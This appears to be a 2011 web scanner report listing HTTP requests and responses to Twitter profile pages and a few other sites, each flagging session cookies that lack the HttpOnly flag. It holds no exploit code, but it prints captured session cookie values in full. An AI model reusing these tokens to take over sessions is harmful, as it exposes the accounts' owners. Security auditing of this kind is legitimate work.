GET /thehomeorg HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:47:23 GMT Server: hi Status: 200 OK X-Transaction: 1296265643-97614-35318 ETag: "131b1fb1d163bdaa604bee260ed9d1f1" Last-Modified: Sat, 29 Jan 2011 01:47:23 GMT X-Runtime: 0.01375 Content-Type: text/html; charset=utf-8 Content-Length: 53580 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tos HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:20 GMT Server: hi Status: 200 OK X-Transaction: 1296225079-3564-32486 ETag: "735f941540ad8cdd9d04c136eca0b0ca" Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT X-Runtime: 0.05573 Content-Type: text/html; charset=utf-8 Content-Length: 30493 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTVmY2EyMDkzM2Y2ZWRjNTgyZmQ3ZDA5ZDQwYWE1%250AMDY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--2b07f7d8732d93af6476b2abb8e4dcef9120730e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /townsandtrails HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:28 GMT Server: hi Status: 200 OK X-Transaction: 1296225028-55890-31920 ETag: "8cefd1f1479aaa09aab96f1e9191b50f" Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT X-Runtime: 0.01466 Content-Type: text/html; charset=utf-8 Content-Length: 50670 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /travis HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:35 GMT Server: hi Status: 200 OK X-Transaction: 1296225035-81767-49969 ETag: "87ddebc7da76c7d19a026c1d7f912c12" Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT X-Runtime: 0.01393 Content-Type: text/html; charset=utf-8 Content-Length: 56939 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tylerseguin92 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:56 GMT Server: hi Status: 200 OK X-Transaction: 1296266036-23768-37977 ETag: "259dab0c6ed9a5201ee9cf6df844e230" Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT X-Runtime: 0.01340 Content-Type: text/html; charset=utf-8 Content-Length: 21949 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /waynecountylife HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:36 GMT Server: hi Status: 200 OK X-Transaction: 1296225036-43124-3354 ETag: "04a252192aa79528cad7c5c11d3825f3" Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT X-Runtime: 0.35094 Content-Type: text/html; charset=utf-8 Content-Length: 54878 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIidodHRwOi8vdHdpdHRlci5jb20vd2F5bmVjb3Vu%250AdHlsaWZlOgxjc3JmX2lkIiUyZDVjNDY0MjVjZjk4MWU0NDI1ZGZkZWI1OTNl%250ANDIxYzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--90d7bcbfc68d4b17546f6b6e6696899149d482a7; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webandy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:39 GMT Server: hi Status: 200 OK X-Transaction: 1296224919-86126-59712 ETag: "072bd7c69249b014a8eea541d0e13ce7" Last-Modified: Fri, 28 Jan 2011 14:28:39 GMT X-Runtime: 0.46070 Content-Type: text/html; charset=utf-8 Content-Length: 51273 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIh9odHRwOi8vdHdpdHRlci5jb20vd2ViYW5keToM%250AY3NyZl9pZCIlMzU4ODlhZDFhNTVmNjY2ODliNTc5MzYzYjlkMzVmNjc6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--69ca8ae41a9f970b1732fe7d2a927b6f2859758a; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webandy/status/30434889127960577 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:40 GMT Server: hi Status: 200 OK X-Transaction: 1296224919-88479-17443 ETag: "57ec15d6db2e642f3190ad41e31c8dd6" Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT X-Runtime: 0.03905 Content-Type: text/html; charset=utf-8 Content-Length: 13641 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6DGNzcmZfaWQiJTI5OWQ2NTRkM2U2%250AN2EyOGYyMDE5ZGJhNjA0YjRhZmM2OgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--84b9c2aee944901e5bd61754af202b278a459d82; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /widgets HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 301 Moved Permanently Date: Fri, 28 Jan 2011 17:13:10 GMT Server: hi Status: 301 Moved Permanently X-Transaction: 1296234790-96747-3920 Last-Modified: Fri, 28 Jan 2011 17:13:10 GMT Location: http://twitter.com/about/resources/widgets X-Runtime: 0.00778 Content-Type: text/html; charset=utf-8 Content-Length: 108 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/about/resources/widgets">redirected</a>.</body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /zonajones HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:57 GMT Server: hi Status: 200 OK X-Transaction: 1296265977-81164-11891 ETag: "18ef6945dbad6fc926ced7c8559a729e" Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT X-Runtime: 0.01559 Content-Type: text/html; charset=utf-8 Content-Length: 47763 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=RTFIABV0BZYUKCUUCAWCFEY; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.berkshireeagle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Home'><meta name="keywords" content="Berkshire Eagle headlines"/><title>Home - Berkshire Ea ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /herald/ HTTP/1.1 Host: www.collegeanduniversity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:30:22 GMT Server: Apache Set-Cookie: CFID=23963338;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/ Set-Cookie: CFTOKEN=f88699cd696e59f-D0093CEE-19B9-F336-D82E00A07F24E43B;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/ Set-Cookie: JSESSIONID=2230a73fafc47a1826775e4a1668b3f46594;path=/ Set-Cookie: CUNET.SHOWDEBUG=0;path=/ Set-Cookie: CU2005FRONTAPPKEY.SHOWDEBUG=0;path=/ Set-Cookie: CID=175;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/ P3P: CP='ADMa DEVa OUR IND DSP NON COR' Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28386
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Find Online College Degrees - Top Online Universities at Collegeanduniversity.net</title> <meta name="Descriptio ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=7d3a89d5f21954b4e37104192891668e; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /main/do/Privacy_Policy HTTP/1.1 Host: www.dominionenterprises.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /main/do/Terms_of_Use HTTP/1.1 Host: www.dominionenterprises.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Terms of Use</title> <base href="http://www.dominionenterprises.com/" /> <meta http-eq ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
